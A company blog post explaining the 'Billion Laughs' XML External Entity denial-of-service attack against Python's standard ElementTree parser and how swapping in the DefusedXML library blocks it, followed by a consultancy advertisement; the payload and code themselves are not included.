Preventing XML External Entity Attacks with Python
One of the most prevalent web application software vulnerabilities is known as the XML External Entity (XXE) attack. XXE is currently the number four item on the Open Web Application Security...
Introduction
One of the most prevalent web application software vulnerabilities is known as the XML External Entity (XXE) attack. XXE is currently the number four item on the Open Web Application Security Project’s (OWASP) Top Ten list of web application security risks. [1] The XXE attack method allows “attackers [to] exploit vulnerable XML processors if they can upload XML or include hostile content in an XML document, exploiting vulnerable code, dependencies or integrations” [2] and “these flaws can be used to extract data, execute a remote request from the server, scan internal systems, perform a denial-of-service attack, as well as execute other attacks.” [Ibid]
In this blog post, we will illustrate what this attack looks like through a practical example, show how it works in a Python-centric environment, and demonstrate a recommended way how one can go about addressing the problem with some simple changes to their source code.
The “Billion Laughs” Denial of Service Attack
One such attack, which we will focus on in this article, can be used to deny service to an application and is popularly known as “Billion Laughs”. This attack exploits vulnerable XML parsers into consuming vast amounts of system RAM via malicious XML entity references.
A Vulnerable Python Example
Consider the following XML document: [3]
The above XML document contains a root element with text containing an entity reference “&lol9” which expands when processed into another entity reference “&lol8” which then expands into another entity reference, and so on down through many other references until it at last finally hits the base text “lol”. Vulnerable XML processors will expand this simple document until it contains 10 to the 9th power text strings containing the phrase “lol”, hence illustrating the name of the attack in question.
Now, consider this simple Python code example:
The above Python code utilizes the ElementTree class built into the standard Python library to attempt to parse our XML document, named “billion_laughs_attack.xml” in our example. When executed, this one line of code begins to consume a copious amount of system resources to expand all of the entities out. When I ran this code on my laptop, it consumed all 32 GBs of my system RAM (excluding RAM already dedicated to other processes already running) and raised a MemoryError (Python’s way of saying that all system RAM has been allocated when more was needed):
The image on the left shows my system memory snapshot before running the example code and the image on the right shows the system memory snapshot afterward. From these images, it is clear just how serious this attack can be if exploited. Tie in the fact that we are simply using the Python standard library and it should become evident we have a potentially dangerous situation on our hands.
The DefusedXML Library
Luckily, one solution to this kind of attack is very simple to employ. There is a Python package called DefusedXML which can be used to swap out standard library functionality and disallow certain XML features from being used maliciously. Consider the below example: [4]
This Python snippet is different from our previous example in one crucial way: the import statement has been changed to use the ElementTree class from the DefusedXML library instead of from the standard Python etree library. When executed, this code will immediately fail with an EntitiesForbidden exception:
Web application code can take advantage of this library to prevent the “Billion Laughs” attack and other well-known XXE vulnerabilities, as illustrated in this simple example. The documentation linked above for the DefusedXML library goes into depth into what it can help protect your system from and illustrates some common examples.
Conclusion
XXE is an often-overlooked category of attack methods in web application development, but there are some simple and easy to use tools available to mitigate these risks. We have focused on one of a handful of scenarios in this post, but I encourage the reader to investigate this class of attacks in more depth, especially with the prevalence of XML as a data interchange medium.
The JBS Quick Launch Lab
Free Qualified Assessment
Quantify what it will take to implement your next big idea!
Our assessment session will deliver tangible timelines, costs, high-level requirements, and recommend architectures that will work best. Let JBS prove to you and your team why over 24 years of experience matters.